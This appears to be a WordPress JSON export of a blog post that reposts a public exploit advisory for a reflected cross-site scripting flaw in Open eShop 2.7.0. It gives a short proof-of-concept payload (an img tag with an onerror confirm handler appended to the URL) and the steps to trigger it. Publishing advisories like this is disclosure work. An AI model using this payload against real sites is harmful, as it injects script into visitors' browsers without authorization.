{"id":56127,"date":"2024-04-08T18:50:06","date_gmt":"2024-04-08T14:50:06","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177981\/openeshop270-xss.txt"},"modified":"2024-04-08T18:50:06","modified_gmt":"2024-04-08T14:50:06","slug":"open-eshop-2-7-0-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/open-eshop-2-7-0-cross-site-scripting\/","title":{"rendered":"Open eShop 2.7.0 Cross Site Scripting"},"content":{"rendered":"<pre readability=\"6.5\"><code readability=\"7\"># Exploit Title: Open eShop Version : 2.7.0 - Reflected XSS<br># Exploit Author: tmrswrr <br># Vendor Homepage: http:\/\/www.open-eshop.com\/<br># Version : 2.7.0<br># Date : 04\/08\/2024<p>1 ) Go to home page https:\/\/127.0.0.1\/Open_eShop<br>2 ) Write url this payload : test.html\"&gt;&lt;img src=x onerrora=confirm() onerror=confirm(1)&gt;<\/p><p>3 ) After save it you will be see xss alert<\/p><p>https:\/\/127.0.0.1\/Open_eShop\/test.html\"&gt;&lt;img src=x onerrora=confirm() onerror=confirm(1)&gt;<\/p><\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Open eShop Version : 2.7.0 &#8211; Reflected XSS# Exploit Author: tmrswrr # Vendor Homepage: http:\/\/www.open-eshop.com\/# Version : 2.7.0# Date : 04\/08\/20241 ) Go to home page https:\/\/127.0.0.1\/Open_eShop2 ) Write url this payload : test.html&#8221;&gt;&lt;img src=x onerrora=confirm() onerror=confirm(1)&gt;3 ) After save it you will be see xss alerthttps:\/\/127.0.0.1\/Open_eShop\/test.html&#8221;&gt;&lt;img src=x onerrora=confirm() onerror=confirm(1)&gt;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56127","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56127","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56127"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56127\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56127"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56127"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56127"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}